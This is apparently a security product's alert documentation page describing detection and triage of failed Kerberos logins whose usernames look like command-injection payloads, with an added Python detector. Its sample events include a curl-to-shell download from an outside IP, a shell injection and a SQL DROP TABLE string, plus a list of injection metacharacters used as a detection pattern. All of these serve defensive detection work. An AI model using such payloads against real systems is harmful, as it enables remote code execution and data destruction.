Failed Login for a Long Username with Special Characters

The Failed Login for a Long Username with Special Characters alert indicates that a user account with a long name (more than 15 characters) that also contains special characters tried to log in to the domain and failed because the Kerberos KDC did not find the account in its database.

Synopsis

10 minutes
3 days
14 days
10 minutes
Traffic and Enhanced Application logs, or Windows event logs forwarded via Windows Event Collector (WEC).
Severity
High

Description

A user account with a long name (more than 15 characters) that also contains special characters tried to log in to the domain and failed because the account does not exist in the Kerberos database (the KDC rejected the request as an unknown principal). Legitimate account names rarely look like this; a string of that shape is more consistent with an injection payload that an internet-facing service passed through unchanged as the username when it authenticated to the domain on the client's behalf. The alert may therefore indicate exploitation attempts (e.g. command injection) against internet-facing assets that use Kerberos authentication.
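The following is an added example of the detection logic described above, run over constructed Windows Security event 4768 (Kerberos TGT request) records; it is not code from the original page or from the vendor. The 15-character threshold, the result code 0x6 (client not found in Kerberos database) and the field names follow the 4768 event schema; the allowed-character set, the marker table and all sample values are assumptions made for the example. It also handles two edge cases a naive "contains special characters" rule gets wrong: computer accounts, which legitimately end in `$`, and UPN-style names containing `@` and `.`.

```python
import re
from collections import Counter

# Constructed sample events in the shape of Windows Security event 4768.
# Field names follow the 4768 EventData schema; all values are made up.
SAMPLE_EVENTS = [
    # Ordinary user with a typo in the name: short, no special characters.
    {"EventID": 4768, "TargetUserName": "jsmtih", "Status": "0x6",
     "IpAddress": "::ffff:10.20.30.40"},
    # Computer account: 16 characters, but the trailing '$' is legitimate.
    {"EventID": 4768, "TargetUserName": "WS-FINANCE-0142$", "Status": "0x6",
     "IpAddress": "::ffff:10.20.31.7"},
    # UPN-style name: long and contains '@' and '.', still a normal username.
    {"EventID": 4768, "TargetUserName": "first.last@corp.example", "Status": "0x6",
     "IpAddress": "::ffff:10.20.30.41"},
    # Long name with only allowed characters: unknown, but not suspicious.
    {"EventID": 4768, "TargetUserName": "svc_backup_reporting_01", "Status": "0x6",
     "IpAddress": "::ffff:10.20.32.9"},
    # Command-injection payload submitted as the username.
    {"EventID": 4768, "TargetUserName": "admin';uname -a;echo '", "Status": "0x6",
     "IpAddress": "::ffff:203.0.113.55"},
    # Command-substitution payload submitted as the username.
    {"EventID": 4768, "TargetUserName": "$(curl http://198.51.100.7/x|sh)", "Status": "0x6",
     "IpAddress": "::ffff:203.0.113.55"},
    # Pre-auth failure (4771, 0x18): the account exists, so this alert does not apply.
    {"EventID": 4771, "TargetUserName": "x';DROP TABLE users--", "Status": "0x18",
     "IpAddress": "::ffff:203.0.113.56"},
]

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # 4768 Result Code: client not found in Kerberos database
MIN_SUSPICIOUS_LEN = 16             # "more than 15 characters"

# Characters a legitimate sAMAccountName or UPN is expected to contain (assumption).
# '@' and '.' occur in UPNs; a single trailing '$' marks a computer account.
ALLOWED = re.compile(r"^[A-Za-z0-9._@-]+\$?$")

# Shell / SQL metacharacters typical of injection payloads. Used only to
# annotate a finding; the flag/no-flag decision is made by ALLOWED.
INJECTION_MARKERS = {
    ";": "command separator", "|": "pipe", "&": "background/and",
    "`": "backtick substitution", "$(": "command substitution",
    "'": "quote", '"': "quote", "--": "SQL comment",
    "<": "redirect", ">": "redirect",
}


def is_suspicious_username(name):
    """Long name that contains characters outside the allowed set."""
    return len(name) >= MIN_SUSPICIOUS_LEN and not ALLOWED.match(name)


def injection_markers(name):
    """Human-readable labels for the metacharacters present in the name."""
    return sorted({label for tok, label in INJECTION_MARKERS.items() if tok in name})


def normalize_ip(ip):
    """4768 records IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return ip[7:] if ip.lower().startswith("::ffff:") else ip


def detect(events):
    """Return one finding per 4768 event with result 0x6 and a suspicious username."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if int(ev.get("Status", "0x0"), 16) != KDC_ERR_C_PRINCIPAL_UNKNOWN:
            continue
        name = ev.get("TargetUserName", "")
        if not is_suspicious_username(name):
            continue
        findings.append({
            "source": normalize_ip(ev.get("IpAddress", "")),
            "username": name,
            "markers": injection_markers(name),
        })
    return findings


def sources_by_count(findings):
    """Group findings by client IP: the host to pivot to during triage."""
    return Counter(f["source"] for f in findings)


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['source']:15} {f['username']!r}  markers={f['markers']}")
```

Only the two payload-shaped names are reported; the computer account, the UPN and the long-but-plain service account name fall through even though all three exceeded the length threshold and were rejected by the KDC. Grouping by source IP gives the host to check first, since a single internet-facing server authenticating many such names in a short window is the pattern the description calls out.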

Attacker's Goals

An attacker is trying to gain code execution on internet-facing assets through command injection, using input that the asset forwards to Kerberos as a username as the injection point.

Investigative Actions

Check the host and/or user triggering these failed attempts:
  • Is the host running internet-facing services, and does it authenticate to the domain on behalf of external clients?
  • Does the failed username itself look like a payload (shell or SQL metacharacters such as quotes, semicolons, pipes, backticks or `$(`), rather than a typo or a long but well-formed account name?
  • Do the web or application logs of the internet-facing service show requests at the same time carrying the same string?
  • Are we looking at sanctioned vulnerability scanning, i.e. does the source belong to a known scanner and does the timing match a scheduled scan?
